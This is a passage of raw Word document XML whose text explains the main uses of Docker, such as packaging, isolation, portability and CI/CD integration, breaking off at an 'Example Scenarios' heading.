          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="841"/>
    </w:p>
    <w:p w14:paraId="0522D140" w14:textId="340D7C02" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>build, ship, and run applications in isolated, lightweight containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's what it helps with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C23ABA" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="143572C5">
          <v:rect id="_x0000_i3399" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53A711" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Primary Uses of Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D2B8A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Application Packaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC2A6A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Packages an app with its dependencies into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker image</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B42A2E" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ensures consistency across environments (dev, test, prod).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C30258" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Environment Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613DEFCA" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each container runs in its own isolated space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025021C" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prevents software conflicts between apps/services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CEAAF6" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Portability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01818174" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker containers run the same across:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604FE9B3" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Developer’s laptop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C55875" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>On-prem servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF8367" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Public/Private clouds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C0ECD9" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324AFFEC" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Faster Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248D854" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Containers start in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, enabling faster testing and deployment cycles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9FCEF4" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D34892" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run multiple containers for different services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74940963" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each microservice can be developed, deployed, and scaled independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E392102" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. DevOps and CI/CD Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B44848" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Automates build, test, and deploy steps in pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45C40E" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Works well with Jenkins, GitHub Actions, GitLab, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F1504" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Version Control for Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105622AE" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dockerfiles define infrastructure as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D3A29" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Track changes in app environment setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D25A4" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Resource Efficiency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09C9E4" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Containers use </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less memory/CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to full virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92E3FA" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6180A5F6">
          <v:rect id="_x0000_i3400" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D40D7D8" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA55422" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
